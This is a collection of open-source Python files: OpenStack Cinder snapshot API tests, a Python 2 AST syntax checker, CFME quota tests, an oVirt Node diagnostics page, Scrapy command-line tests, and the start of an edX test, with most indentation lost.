ctx = context.RequestContext('admin', 'fake', True)
snapshot_obj = fake_snapshot.fake_snapshot_obj(ctx, **snapshot)
fake_volume_obj = fake_volume.fake_volume_obj(ctx)
snapshot_get_by_id.return_value = snapshot_obj
volume_get_by_id.return_value = fake_volume_obj
req = fakes.HTTPRequest.blank('/v2/snapshots/%s' % UUID)
resp_dict = self.controller.show(req, UUID)
self.assertIn('snapshot', resp_dict)
self.assertEqual(UUID, resp_dict['snapshot']['id'])
def test_snapshot_show_invalid_id(self):
snapshot_id = INVALID_UUID
req = fakes.HTTPRequest.blank('/v2/snapshots/%s' % snapshot_id)
self.assertRaises(webob.exc.HTTPNotFound,
self.controller.show, req, snapshot_id)
@mock.patch('cinder.db.snapshot_metadata_get', return_value=dict())
@mock.patch('cinder.objects.Volume.get_by_id')
@mock.patch('cinder.objects.Snapshot.get_by_id')
@mock.patch('cinder.volume.api.API.get_all_snapshots')
def test_snapshot_detail(self, get_all_snapshots, snapshot_get_by_id,
volume_get_by_id, snapshot_metadata_get):
snapshot = {
'id': UUID,
'volume_id': 1,
'status': 'available',
'volume_size': 100,
'display_name': 'Default name',
'display_description': 'Default description',
'expected_attrs': ['metadata']
}
ctx = context.RequestContext('admin', 'fake', True)
snapshot_obj = fake_snapshot.fake_snapshot_obj(ctx, **snapshot)
fake_volume_obj = fake_volume.fake_volume_obj(ctx)
snapshot_get_by_id.return_value = snapshot_obj
volume_get_by_id.return_value = fake_volume_obj
snapshots = objects.SnapshotList(objects=[snapshot_obj])
get_all_snapshots.return_value = snapshots
req = fakes.HTTPRequest.blank('/v2/snapshots/detail')
resp_dict = self.controller.detail(req)
self.assertIn('snapshots', resp_dict)
resp_snapshots = resp_dict['snapshots']
self.assertEqual(1, len(resp_snapshots))
resp_snapshot = resp_snapshots.pop()
self.assertEqual(UUID, resp_snapshot['id'])
@mock.patch('cinder.db.snapshot_metadata_get', return_value=dict())
def test_admin_list_snapshots_limited_to_project(self,
snapshot_metadata_get):
req = fakes.HTTPRequest.blank('/v2/fake/snapshots',
use_admin_context=True)
res = self.controller.index(req)
self.assertIn('snapshots', res)
self.assertEqual(1, len(res['snapshots']))
@mock.patch('cinder.db.snapshot_metadata_get', return_value=dict())
def test_list_snapshots_with_limit_and_offset(self,
snapshot_metadata_get):
def list_snapshots_with_limit_and_offset(snaps, is_admin):
            req = fakes.HTTPRequest.blank('/v2/fake/snapshots?limit=1'
                                          '&offset=1',
                                          use_admin_context=is_admin)
res = self.controller.index(req)
self.assertIn('snapshots', res)
self.assertEqual(1, len(res['snapshots']))
self.assertEqual(snaps[1].id, res['snapshots'][0]['id'])
# Test that we get an empty list with an offset greater than the
# number of items
req = fakes.HTTPRequest.blank('/v2/snapshots?limit=1&offset=3')
self.assertEqual({'snapshots': []}, self.controller.index(req))
self.stubs.UnsetAll()
volume, snaps = self._create_db_snapshots(3)
# admin case
list_snapshots_with_limit_and_offset(snaps, is_admin=True)
# non-admin case
list_snapshots_with_limit_and_offset(snaps, is_admin=False)
@mock.patch.object(db, 'snapshot_get_all_by_project')
@mock.patch('cinder.db.snapshot_metadata_get', return_value=dict())
    def test_list_snapshots_with_wrong_limit_and_offset(self,
mock_metadata_get,
mock_snapshot_get_all):
"""Test list with negative and non numeric limit and offset."""
mock_snapshot_get_all.return_value = []
# Negative limit
req = fakes.HTTPRequest.blank('/v2/snapshots?limit=-1&offset=1')
self.assertRaises(webob.exc.HTTPBadRequest,
self.controller.index,
req)
# Non numeric limit
req = fakes.HTTPRequest.blank('/v2/snapshots?limit=a&offset=1')
self.assertRaises(webob.exc.HTTPBadRequest,
self.controller.index,
req)
# Negative offset
req = fakes.HTTPRequest.blank('/v2/snapshots?limit=1&offset=-1')
self.assertRaises(webob.exc.HTTPBadRequest,
self.controller.index,
req)
# Non numeric offset
req = fakes.HTTPRequest.blank('/v2/snapshots?limit=1&offset=a')
self.assertRaises(webob.exc.HTTPBadRequest,
self.controller.index,
req)
def _assert_list_next(self, expected_query=None, project='fakeproject',
**kwargs):
"""Check a page of snapshots list."""
        # Since we are accessing the v2 api directly we don't need to specify
        # v2 in the request path; if we did, we'd get /v2/v2 links back
request_path = '/%s/snapshots' % project
expected_path = '/v2' + request_path
# Construct the query if there are kwargs
if kwargs:
request_str = request_path + '?' + urllib.urlencode(kwargs)
else:
request_str = request_path
# Make the request
req = fakes.HTTPRequest.blank(request_str)
res = self.controller.index(req)
# We only expect to have a next link if there is an actual expected
# query.
if expected_query:
# We must have the links
self.assertIn('snapshots_links', res)
links = res['snapshots_links']
# Must be a list of links, even if we only get 1 back
            self.assertIsInstance(links, list)
next_link = links[0]
# rel entry must be next
self.assertIn('rel', next_link)
self.assertIn('next', next_link['rel'])
# href entry must have the right path
self.assertIn('href', next_link)
href_parts = urllib.urlparse(next_link['href'])
self.assertEqual(expected_path, href_parts.path)
# And the query from the next link must match what we were
# expecting
params = urllib.parse_qs(href_parts.query)
self.assertDictEqual(expected_query, params)
# Make sure we don't have links if we were not expecting them
else:
self.assertNotIn('snapshots_links', res)
def _create_db_snapshots(self, num_snaps):
volume = utils.create_volume(self.ctx)
snaps = [utils.create_snapshot(self.ctx,
volume.id,
display_name='snap' + str(i))
for i in range(num_snaps)]
self.addCleanup(db.volume_destroy, self.ctx, volume.id)
for snap in snaps:
self.addCleanup(db.snapshot_destroy, self.ctx, snap.id)
snaps.reverse()
return volume, snaps
def test_list_snapshots_next_link_default_limit(self):
"""Test that snapshot list pagination is limited by osapi_max_limit."""
self.stubs.UnsetAll()
volume, snaps = self._create_db_snapshots(3)
        # NOTE(geguileo): Since cinder.api.common.limited has already been
        # imported, its argument max_limit already has a default value of
        # 1000, so it doesn't matter that we change it to 2. That's why we
        # need to mock it and pass it the current value. We still need to set
        # the default value because other sections of the code use it, for
        # example _get_collection_links
CONF.set_default('osapi_max_limit', 2)
def get_pagination_params(params, max_limit=CONF.osapi_max_limit,
original_call=common.get_pagination_params):
return original_call(params, max_limit)
def _get_limit_param(params, max_limit=CONF.osapi_max_limit,
original_call=common._get_limit_param):
return original_call(params, max_limit)
with mock.patch.object(common, 'get_pagination_params',
get_pagination_params), \
mock.patch.object(common, '_get_limit_param',
_get_limit_param):
# The link from the first page should link to the second
self._assert_list_next({'marker': [snaps[1].id]})
# Second page should have no next link
self._assert_list_next(marker=snaps[1].id)
def test_list_snapshots_next_link_with_limit(self):
"""Test snapshot list pagination with specific limit."""
self.stubs.UnsetAll()
volume, snaps = self._create_db_snapshots(2)
# The link from the first page should link to the second
self._assert_list_next({'limit': ['1'], 'marker': [snaps[0].id]},
limit=1)
# Even though there are no more elements, we should get a next element
# per specification.
expected = {'limit': ['1'], 'marker': [snaps[1].id]}
self._assert_list_next(expected, limit=1, marker=snaps[0].id)
# When we go beyond the number of elements there should be no more
# next links
self._assert_list_next(limit=1, marker=snaps[1].id)
@mock.patch('cinder.db.snapshot_metadata_get', return_value=dict())
def test_admin_list_snapshots_all_tenants(self, snapshot_metadata_get):
req = fakes.HTTPRequest.blank('/v2/fake/snapshots?all_tenants=1',
use_admin_context=True)
res = self.controller.index(req)
self.assertIn('snapshots', res)
self.assertEqual(3, len(res['snapshots']))
@mock.patch('cinder.db.snapshot_metadata_get', return_value=dict())
def test_all_tenants_non_admin_gets_all_tenants(self,
snapshot_metadata_get):
req = fakes.HTTPRequest.blank('/v2/fake/snapshots?all_tenants=1')
res = self.controller.index(req)
self.assertIn('snapshots', res)
self.assertEqual(1, len(res['snapshots']))
@mock.patch('cinder.db.snapshot_metadata_get', return_value=dict())
def test_non_admin_get_by_project(self, snapshot_metadata_get):
req = fakes.HTTPRequest.blank('/v2/fake/snapshots')
res = self.controller.index(req)
self.assertIn('snapshots', res)
self.assertEqual(1, len(res['snapshots']))
def _create_snapshot_bad_body(self, body):
req = fakes.HTTPRequest.blank('/v2/fake/snapshots')
req.method = 'POST'
self.assertRaises(webob.exc.HTTPBadRequest,
self.controller.create, req, body)
def test_create_no_body(self):
self._create_snapshot_bad_body(body=None)
def test_create_missing_snapshot(self):
body = {'foo': {'a': 'b'}}
self._create_snapshot_bad_body(body=body)
def test_create_malformed_entity(self):
body = {'snapshot': 'string'}
self._create_snapshot_bad_body(body=body)
class SnapshotSerializerTest(test.TestCase):
def _verify_snapshot(self, snap, tree):
self.assertEqual('snapshot', tree.tag)
for attr in ('id', 'status', 'size', 'created_at',
'name', 'description', 'volume_id'):
self.assertEqual(str(snap[attr]), tree.get(attr))
def test_snapshot_show_create_serializer(self):
serializer = snapshots.SnapshotTemplate()
raw_snapshot = dict(
id='snap_id',
status='snap_status',
size=1024,
created_at=timeutils.utcnow(),
name='snap_name',
description='snap_desc',
display_description='snap_desc',
volume_id='vol_id',
)
text = serializer.serialize(dict(snapshot=raw_snapshot))
tree = etree.fromstring(text)
self._verify_snapshot(raw_snapshot, tree)
def test_snapshot_index_detail_serializer(self):
serializer = snapshots.SnapshotsTemplate()
raw_snapshots = [
dict(
id='snap1_id',
status='snap1_status',
size=1024,
created_at=timeutils.utcnow(),
name='snap1_name',
description='snap1_desc',
volume_id='vol1_id',
),
dict(
id='snap2_id',
status='snap2_status',
size=1024,
created_at=timeutils.utcnow(),
name='snap2_name',
description='snap2_desc',
volume_id='vol2_id',
)
]
text = serializer.serialize(dict(snapshots=raw_snapshots))
tree = etree.fromstring(text)
self.assertEqual('snapshots', tree.tag)
self.assertEqual(len(raw_snapshots), len(tree))
for idx, child in enumerate(tree):
self._verify_snapshot(raw_snapshots[idx], child)
|
apache-2.0
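The snapshot tests above rely heavily on mock.patch.object to keep controller calls away from a real backend. A self-contained sketch of that pattern; the Volume class here is hypothetical, not cinder's:

import mock

class Volume(object):
    def delete_snapshot(self, snapshot_id):
        raise RuntimeError('would touch a real backend')

@mock.patch.object(Volume, 'delete_snapshot', return_value=None)
def exercise(mocked_delete):
    Volume().delete_snapshot('some-uuid')  # hits the mock, not the backend
    mocked_delete.assert_called_once_with('some-uuid')

exercise()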
|
emilk/sproxel
|
distro/common/lib/compiler/syntax.py
|
25
|
1490
|
"""Check for errs in the AST.
The Python parser does not catch all syntax errors. Others, like
assignments with invalid targets, are caught in the code generation
phase.
The compiler package catches some errors in the transformer module.
But it seems clearer to write checkers that use the AST to detect
errors.
"""
from compiler import ast, walk
def check(tree, multi=None):
v = SyntaxErrorChecker(multi)
walk(tree, v)
return v.errors
class SyntaxErrorChecker:
"""A visitor to find syntax errors in the AST."""
def __init__(self, multi=None):
"""Create new visitor object.
If optional argument multi is not None, then print messages
for each error rather than raising a SyntaxError for the
first.
"""
self.multi = multi
self.errors = 0
def error(self, node, msg):
self.errors = self.errors + 1
if self.multi is not None:
print "%s:%s: %s" % (node.filename, node.lineno, msg)
else:
raise SyntaxError, "%s (%s:%s)" % (msg, node.filename, node.lineno)
def visitAssign(self, node):
# the transformer module handles many of these
pass
## for target in node.nodes:
## if isinstance(target, ast.AssList):
## if target.lineno is None:
## target.lineno = node.lineno
## self.error(target, "can't assign to list comprehension")
|
bsd-3-clause
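The compiler package used above is Python-2-only; the same visitor idea survives in the stdlib ast module. A rough modern sketch, with one concrete check (the always-true tuple assert) standing in for the error method above:

import ast

class AssertTupleChecker(ast.NodeVisitor):
    """Flag `assert (cond, msg)`, which is always true because a
    non-empty tuple is truthy."""
    def __init__(self, filename):
        self.filename = filename
        self.errors = 0

    def visit_Assert(self, node):
        if isinstance(node.test, ast.Tuple) and node.test.elts:
            self.errors += 1
            print('%s:%s: assertion is always true' % (self.filename, node.lineno))
        self.generic_visit(node)

checker = AssertTupleChecker('<example>')
checker.visit(ast.parse('assert (x == 1, "oops")', filename='<example>'))
print(checker.errors)  # -> 1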
|
apagac/cfme_tests
|
cfme/tests/cloud/test_quota_tagging.py
|
3
|
10773
|
# -*- coding: utf-8 -*-
import fauxfactory
import pytest
from riggerlib import recursive_update
from widgetastic.utils import partial_match
from cfme import test_requirements
from cfme.cloud.provider.openstack import OpenStackProvider
from cfme.services.service_catalogs import ServiceCatalogs
from cfme.utils.appliance import ViaSSUI
from cfme.utils.appliance import ViaUI
from cfme.utils.generators import random_vm_name
from cfme.utils.update import update
pytestmark = [
test_requirements.quota,
pytest.mark.usefixtures('setup_provider'),
pytest.mark.provider([OpenStackProvider],
required_fields=[['provisioning', 'image']], scope="module")
]
@pytest.fixture
def admin_email(appliance):
"""Required for user quota tagging services to work, as it's mandatory for it's functioning."""
user = appliance.collections.users
admin = user.instantiate(name='Administrator')
with update(admin):
admin.email = fauxfactory.gen_email()
yield
with update(admin):
admin.email = ''
@pytest.fixture
def vm_name():
return random_vm_name(context='quota')
@pytest.fixture
def template_name(provisioning):
return provisioning["image"]["name"]
@pytest.fixture
def prov_data(provider, vm_name, template_name):
if provider.one_of(OpenStackProvider):
return {
"catalog": {'vm_name': vm_name, 'catalog_name': {'name': template_name}},
"environment": {'automatic_placement': True},
"properties": {'instance_type': partial_match('m1.large')}
}
@pytest.fixture(scope='module')
def domain(appliance):
domain = appliance.collections.domains.create('test_{}'.format(fauxfactory.gen_alphanumeric()),
'description_{}'.format(
fauxfactory.gen_alphanumeric()),
enabled=True)
yield domain
if domain.exists:
domain.delete()
@pytest.fixture
def catalog_item(appliance, provider, dialog, catalog, prov_data):
collection = appliance.collections.catalog_items
catalog_item = collection.create(
provider.catalog_item_type,
name='test_{}'.format(fauxfactory.gen_alphanumeric()),
description='test catalog',
display_in=True,
catalog=catalog,
dialog=dialog,
prov_data=prov_data)
yield catalog_item
if catalog_item.exists:
catalog_item.delete()
@pytest.fixture(scope='module')
def max_quota_test_instance(appliance, domain):
miq = appliance.collections.domains.instantiate('ManageIQ')
original_instance = (
miq.namespaces.instantiate('System')
.namespaces.instantiate('CommonMethods')
.classes.instantiate('QuotaMethods')
.instances.instantiate('quota_source')
)
original_instance.copy_to(domain=domain)
original_instance = (
miq.namespaces.instantiate('System')
.namespaces.instantiate('CommonMethods')
.classes.instantiate('QuotaStateMachine')
.instances.instantiate('quota')
)
original_instance.copy_to(domain=domain)
instance = (
domain.namespaces.instantiate('System')
.namespaces.instantiate('CommonMethods')
.classes.instantiate('QuotaStateMachine')
.instances.instantiate('quota')
)
return instance
def set_entity_quota_source(max_quota_test_instance, entity):
with update(max_quota_test_instance):
max_quota_test_instance.fields = {'quota_source_type': {'value': entity}}
@pytest.fixture(params=['user', 'group'])
def set_entity_quota_source_change(max_quota_test_instance, request):
entity_value = request.param
with update(max_quota_test_instance):
max_quota_test_instance.fields = {'quota_source_type': {'value': entity_value}}
@pytest.fixture(params=[('groups', 'group', 'EvmGroup-super_administrator'),
('users', 'user', 'Administrator')], ids=['group', 'user'], scope='module')
def entities(appliance, request, max_quota_test_instance):
collection, entity, description = request.param
set_entity_quota_source(max_quota_test_instance, entity)
return getattr(appliance.collections, collection).instantiate(description)
@pytest.fixture(scope='function')
def set_entity_quota_tag(request, entities, appliance):
tag, value = request.param
tag = appliance.collections.categories.instantiate(
display_name=tag).collections.tags.instantiate(
display_name=value)
entities.add_tag(tag)
yield
    # refresh the page, as navigation to configuration is blocked while alerts are on the requests page
appliance.server.browser.refresh()
entities.remove_tag(tag)
@pytest.mark.parametrize(
['set_entity_quota_tag'],
[
[('Quota - Max Memory *', '1GB')],
[('Quota - Max Storage *', '10GB')],
[('Quota - Max CPUs *', '1')]
],
indirect=['set_entity_quota_tag'],
ids=['max_memory', 'max_storage', 'max_cpu']
)
def test_quota_tagging_cloud_via_lifecycle(request, appliance, provider, prov_data,
set_entity_quota_tag, template_name, vm_name):
"""Test Group and User Quota in UI using tagging
Polarion:
assignee: ghubale
casecomponent: Cloud
initialEstimate: 1/6h
tags: quota
"""
recursive_update(prov_data, {
'request': {'email': 'test_{}@example.com'.format(fauxfactory.gen_alphanumeric())}})
prov_data.update({'template_name': template_name})
appliance.collections.cloud_instances.create(vm_name, provider, prov_data, override=True)
# nav to requests page to check quota validation
request_description = 'Provision from [{template}] to [{vm}]'.format(template=template_name,
vm=vm_name)
provision_request = appliance.collections.requests.instantiate(request_description)
provision_request.wait_for_request(method='ui')
request.addfinalizer(provision_request.remove_request)
assert provision_request.row.reason.text == "Quota Exceeded"
@pytest.mark.parametrize('context', [ViaSSUI, ViaUI])
@pytest.mark.parametrize(
['set_entity_quota_tag'],
[
[('Quota - Max Memory *', '1GB')],
[('Quota - Max Storage *', '10GB')],
[('Quota - Max CPUs *', '1')]
],
indirect=['set_entity_quota_tag'],
ids=['max_memory', 'max_storage', 'max_cpu']
)
def test_quota_tagging_cloud_via_services(appliance, request, context, admin_email,
set_entity_quota_tag, catalog_item):
"""Test Group and User Quota in UI and SSUI using tagging
Polarion:
assignee: ghubale
casecomponent: Cloud
initialEstimate: 1/6h
tags: quota
"""
with appliance.context.use(context):
service_catalogs = ServiceCatalogs(appliance, catalog_item.catalog, catalog_item.name)
if context is ViaSSUI:
service_catalogs.add_to_shopping_cart()
service_catalogs.order()
# nav to requests page to check quota validation
request_description = 'Provisioning Service [{0}] from [{0}]'.format(catalog_item.name)
provision_request = appliance.collections.requests.instantiate(request_description)
provision_request.wait_for_request(method='ui')
request.addfinalizer(provision_request.remove_request)
assert provision_request.row.reason.text == "Quota Exceeded"
def test_cloud_quota_by_lifecycle(request, appliance, provider, set_entity_quota_source_change,
prov_data, vm_name, template_name):
"""Testing cloud quota for user and group by provisioning instance via lifecycle
Polarion:
assignee: ghubale
initialEstimate: 1/4h
casecomponent: Cloud
tags: quota
testSteps:
1. Navigate to Automation > automate > Explorer
2. Create new Domain and copy 'quota' and 'quota_source' method
            3. Change 'value' of 'quota_source_type' to 'user' or 'group' (one by one) in 'quota'
               method
4. Provision instance via lifecycle
5. Make sure that provisioned 'template' is having more than assigned quota
6. Check whether instance provision 'Denied' with reason 'Quota Exceeded'
"""
recursive_update(prov_data, {
'request': {'email': 'test_{}@example.com'.format(fauxfactory.gen_alphanumeric())}})
prov_data.update({'template_name': template_name})
appliance.collections.cloud_instances.create(vm_name, provider, prov_data, override=True)
# nav to requests page to check quota validation
request_description = 'Provision from [{template}] to [{vm}]'.format(template=template_name,
vm=vm_name)
provision_request = appliance.collections.requests.instantiate(request_description)
provision_request.wait_for_request(method='ui')
request.addfinalizer(provision_request.remove_request)
assert provision_request.row.reason.text == "Quota Exceeded"
@pytest.mark.parametrize('context', [ViaSSUI, ViaUI])
def test_quota_cloud_via_services(appliance, request, admin_email, entities, prov_data,
catalog_item, context):
"""This test case verifies the quota assigned by automation method for user and group
is working correctly for the cloud providers.
Polarion:
assignee: ghubale
initialEstimate: 1/4h
casecomponent: Cloud
tags: quota
testSteps:
1. Navigate to Automation > Automate > Explorer
2. Add quota automation methods to domain
3. Change 'quota_source_type' to 'user' or 'group'
4. Test quota by provisioning instances over quota limit via UI or
SSUI for user and group
5. Check whether quota is exceeded or not
"""
with appliance.context.use(context):
service_catalogs = ServiceCatalogs(appliance, catalog_item.catalog, catalog_item.name)
if context is ViaSSUI:
service_catalogs.add_to_shopping_cart()
service_catalogs.order()
# nav to requests page to check quota validation
request_description = ("Provisioning Service [{catalog_item_name}] from [{catalog_item_name}]"
.format(catalog_item_name=catalog_item.name))
provision_request = appliance.collections.requests.instantiate(request_description)
provision_request.wait_for_request(method='ui')
request.addfinalizer(provision_request.remove_request)
assert provision_request.row.reason.text == "Quota Exceeded"
|
gpl-2.0
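The tagging tests above drive their fixture through indirect parametrization, which is easy to miss on first read: the tuples in the parametrize list arrive at the fixture as request.param. A minimal sketch with made-up tag names:

import pytest

@pytest.fixture
def quota_tag(request):
    # request.param carries one tuple from the parametrize list below
    tag, value = request.param
    return '%s=%s' % (tag, value)

@pytest.mark.parametrize('quota_tag',
                         [('Quota - Max Memory *', '1GB'),
                          ('Quota - Max CPUs *', '1')],
                         indirect=['quota_tag'],
                         ids=['max_memory', 'max_cpu'])
def test_tag_is_applied(quota_tag):
    assert '=' in quota_tag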
|
haiyangd/python-porject
|
src/ovirt/node/setup/core/diagnostics_page.py
|
2
|
3004
|
#!/usr/bin/python
# -*- coding: utf-8 -*-
#
# diagnostics_page.py - Copyright (C) 2012-2014 Red Hat, Inc.
# Written by Fabian Deutsch <fabiand@redhat.com>
#
# This program is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation; version 2 of the License.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program; if not, write to the Free Software
# Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston,
# MA 02110-1301, USA. A copy of the GNU General Public License is
# also available at http://www.gnu.org/copyleft/gpl.html.
from ovirt.node import plugins, ui
from ovirt.node.utils import process
"""
Diagnostics page
"""
class Plugin(plugins.NodePlugin):
def name(self):
return _("Diagnostics")
def rank(self):
return 95
def model(self):
"""Don't need to set up anything"""
return {}
def validators(self):
"""Validators validate the input on change and give UI feedback
"""
return {}
def ui_content(self):
"""Describes the UI this plugin requires
This is an ordered list of (path, widget) tuples.
"""
ws = [ui.Header("diagnostic._header", _("Diagnostic Utilities")),
ui.Label("diagnostic.info", _("Select one of the tools below.")),
ui.Divider("diagnostic.divider"),
ui.Table("diagnostic.tools", "", _("Available diagnostics"),
self.__diagnostics(), height=min(
len(self.__diagnostics()), 4)),
]
page = ui.Page("page", ws)
page.buttons = []
self.widgets.add(page)
return page
def on_change(self, changes):
pass
def on_merge(self, changes):
if changes.contains_any(["diagnostic.logfiles", "diagnostic.tools"]):
cmds = {}
changed_field = changes.keys()[0]
if "diagnostic.tools" in changed_field:
cmds = dict((name, cmd) for (name, cmd)
in self.__diagnostics())
cmd = cmds.get(changes[changed_field], None)
if cmd:
contents = process.check_output(cmd,
stderr=process.STDOUT,
shell=True)
return ui.TextViewDialog("output.dialog", _("Command Output"),
contents)
def __diagnostics(self):
return [("multipath", "multipath -ll"),
("fdisk", "fdisk -l"),
("parted", "parted -s -l"),
("lsblk", "lsblk")]
|
gpl-2.0
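The plugin above shells out through ovirt.node.utils.process; with plain subprocess the lookup-and-run core looks roughly like this (a sketch, not the plugin's actual helper):

import subprocess

DIAGNOSTICS = [("fdisk", "fdisk -l"),
               ("lsblk", "lsblk")]

def run_diagnostic(name):
    cmd = dict(DIAGNOSTICS).get(name)
    if cmd is None:
        raise KeyError(name)
    # shell=True mirrors how the plugin invokes its tools above
    return subprocess.check_output(cmd, stderr=subprocess.STDOUT, shell=True)

print(run_diagnostic("lsblk"))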
|
fontenele/scrapy
|
tests/test_commands.py
|
105
|
8613
|
import os
import sys
import subprocess
import tempfile
from time import sleep
from os.path import exists, join, abspath
from shutil import rmtree
from tempfile import mkdtemp
from twisted.trial import unittest
from twisted.internet import defer
from scrapy.utils.python import retry_on_eintr
from scrapy.utils.test import get_testenv
from scrapy.utils.testsite import SiteTest
from scrapy.utils.testproc import ProcessTest
class ProjectTest(unittest.TestCase):
project_name = 'testproject'
def setUp(self):
self.temp_path = mkdtemp()
self.cwd = self.temp_path
self.proj_path = join(self.temp_path, self.project_name)
self.proj_mod_path = join(self.proj_path, self.project_name)
self.env = get_testenv()
def tearDown(self):
rmtree(self.temp_path)
def call(self, *new_args, **kwargs):
with tempfile.TemporaryFile() as out:
args = (sys.executable, '-m', 'scrapy.cmdline') + new_args
return subprocess.call(args, stdout=out, stderr=out, cwd=self.cwd,
env=self.env, **kwargs)
def proc(self, *new_args, **kwargs):
args = (sys.executable, '-m', 'scrapy.cmdline') + new_args
p = subprocess.Popen(args, cwd=self.cwd, env=self.env,
stdout=subprocess.PIPE, stderr=subprocess.PIPE,
**kwargs)
waited = 0
interval = 0.2
while p.poll() is None:
sleep(interval)
waited += interval
if waited > 15:
p.kill()
assert False, 'Command took too much time to complete'
return p
class StartprojectTest(ProjectTest):
def test_startproject(self):
self.assertEqual(0, self.call('startproject', self.project_name))
assert exists(join(self.proj_path, 'scrapy.cfg'))
assert exists(join(self.proj_path, 'testproject'))
assert exists(join(self.proj_mod_path, '__init__.py'))
assert exists(join(self.proj_mod_path, 'items.py'))
assert exists(join(self.proj_mod_path, 'pipelines.py'))
assert exists(join(self.proj_mod_path, 'settings.py'))
assert exists(join(self.proj_mod_path, 'spiders', '__init__.py'))
self.assertEqual(1, self.call('startproject', self.project_name))
self.assertEqual(1, self.call('startproject', 'wrong---project---name'))
self.assertEqual(1, self.call('startproject', 'sys'))
class CommandTest(ProjectTest):
def setUp(self):
super(CommandTest, self).setUp()
self.call('startproject', self.project_name)
self.cwd = join(self.temp_path, self.project_name)
self.env['SCRAPY_SETTINGS_MODULE'] = '%s.settings' % self.project_name
class GenspiderCommandTest(CommandTest):
def test_arguments(self):
# only pass one argument. spider script shouldn't be created
self.assertEqual(2, self.call('genspider', 'test_name'))
assert not exists(join(self.proj_mod_path, 'spiders', 'test_name.py'))
# pass two arguments <name> <domain>. spider script should be created
self.assertEqual(0, self.call('genspider', 'test_name', 'test.com'))
assert exists(join(self.proj_mod_path, 'spiders', 'test_name.py'))
def test_template(self, tplname='crawl'):
args = ['--template=%s' % tplname] if tplname else []
spname = 'test_spider'
p = self.proc('genspider', spname, 'test.com', *args)
out = retry_on_eintr(p.stdout.read)
self.assertIn("Created spider %r using template %r in module" % (spname, tplname), out)
self.assertTrue(exists(join(self.proj_mod_path, 'spiders', 'test_spider.py')))
p = self.proc('genspider', spname, 'test.com', *args)
out = retry_on_eintr(p.stdout.read)
self.assertIn("Spider %r already exists in module" % spname, out)
def test_template_basic(self):
self.test_template('basic')
def test_template_csvfeed(self):
self.test_template('csvfeed')
def test_template_xmlfeed(self):
self.test_template('xmlfeed')
def test_list(self):
self.assertEqual(0, self.call('genspider', '--list'))
def test_dump(self):
self.assertEqual(0, self.call('genspider', '--dump=basic'))
self.assertEqual(0, self.call('genspider', '-d', 'basic'))
def test_same_name_as_project(self):
self.assertEqual(2, self.call('genspider', self.project_name))
assert not exists(join(self.proj_mod_path, 'spiders', '%s.py' % self.project_name))
class MiscCommandsTest(CommandTest):
def test_list(self):
self.assertEqual(0, self.call('list'))
class RunSpiderCommandTest(CommandTest):
def test_runspider(self):
tmpdir = self.mktemp()
os.mkdir(tmpdir)
fname = abspath(join(tmpdir, 'myspider.py'))
with open(fname, 'w') as f:
f.write("""
import scrapy
class MySpider(scrapy.Spider):
name = 'myspider'
def start_requests(self):
self.logger.debug("It Works!")
return []
""")
p = self.proc('runspider', fname)
log = p.stderr.read()
self.assertIn("DEBUG: It Works!", log)
self.assertIn("INFO: Spider opened", log)
self.assertIn("INFO: Closing spider (finished)", log)
self.assertIn("INFO: Spider closed (finished)", log)
def test_runspider_no_spider_found(self):
tmpdir = self.mktemp()
os.mkdir(tmpdir)
fname = abspath(join(tmpdir, 'myspider.py'))
with open(fname, 'w') as f:
f.write("""
from scrapy.spiders import Spider
""")
p = self.proc('runspider', fname)
log = p.stderr.read()
self.assertIn("No spider found in file", log)
def test_runspider_file_not_found(self):
p = self.proc('runspider', 'some_non_existent_file')
log = p.stderr.read()
self.assertIn("File not found: some_non_existent_file", log)
def test_runspider_unable_to_load(self):
tmpdir = self.mktemp()
os.mkdir(tmpdir)
fname = abspath(join(tmpdir, 'myspider.txt'))
with open(fname, 'w') as f:
f.write("")
p = self.proc('runspider', fname)
log = p.stderr.read()
self.assertIn("Unable to load", log)
class ParseCommandTest(ProcessTest, SiteTest, CommandTest):
command = 'parse'
def setUp(self):
super(ParseCommandTest, self).setUp()
self.spider_name = 'parse_spider'
fname = abspath(join(self.proj_mod_path, 'spiders', 'myspider.py'))
with open(fname, 'w') as f:
f.write("""
import scrapy
class MySpider(scrapy.Spider):
name = '{0}'
def parse(self, response):
if getattr(self, 'test_arg', None):
self.logger.debug('It Works!')
return [scrapy.Item(), dict(foo='bar')]
""".format(self.spider_name))
fname = abspath(join(self.proj_mod_path, 'pipelines.py'))
with open(fname, 'w') as f:
f.write("""
import logging
class MyPipeline(object):
component_name = 'my_pipeline'
def process_item(self, item, spider):
logging.info('It Works!')
return item
""")
fname = abspath(join(self.proj_mod_path, 'settings.py'))
with open(fname, 'a') as f:
f.write("""
ITEM_PIPELINES = {'%s.pipelines.MyPipeline': 1}
""" % self.project_name)
@defer.inlineCallbacks
def test_spider_arguments(self):
_, _, stderr = yield self.execute(['--spider', self.spider_name,
'-a', 'test_arg=1',
'-c', 'parse',
self.url('/html')])
self.assertIn("DEBUG: It Works!", stderr)
@defer.inlineCallbacks
def test_pipelines(self):
_, _, stderr = yield self.execute(['--spider', self.spider_name,
'--pipelines',
'-c', 'parse',
self.url('/html')])
self.assertIn("INFO: It Works!", stderr)
@defer.inlineCallbacks
def test_parse_items(self):
status, out, stderr = yield self.execute(
['--spider', self.spider_name, '-c', 'parse', self.url('/html')]
)
self.assertIn("""[{}, {'foo': 'bar'}]""", out)
class BenchCommandTest(CommandTest):
def test_run(self):
p = self.proc('bench', '-s', 'LOGSTATS_INTERVAL=0.001',
'-s', 'CLOSESPIDER_TIMEOUT=0.01')
log = p.stderr.read()
self.assertIn('INFO: Crawled', log)
|
bsd-3-clause
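ProjectTest.call above is a reusable pattern for exercising any CLI from a test: spawn `python -m <module>` with a controlled cwd/env and swallow output into a temp file. A standalone sketch, assuming scrapy is importable:

import subprocess
import sys
import tempfile

def call_cli(*args, **kwargs):
    # run `python -m scrapy.cmdline <args>`; only the exit status matters here
    with tempfile.TemporaryFile() as out:
        cmd = (sys.executable, '-m', 'scrapy.cmdline') + args
        return subprocess.call(cmd, stdout=out, stderr=out, **kwargs)

print(call_cli('version'))  # 0 on success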
|
UXE/local-edx
|
cms/djangoapps/contentstore/tests/test_orphan.py
|
32
|
4165
|
"""
Test finding orphans via the view and django config
"""
import json
from contentstore.tests.utils import CourseTestCase
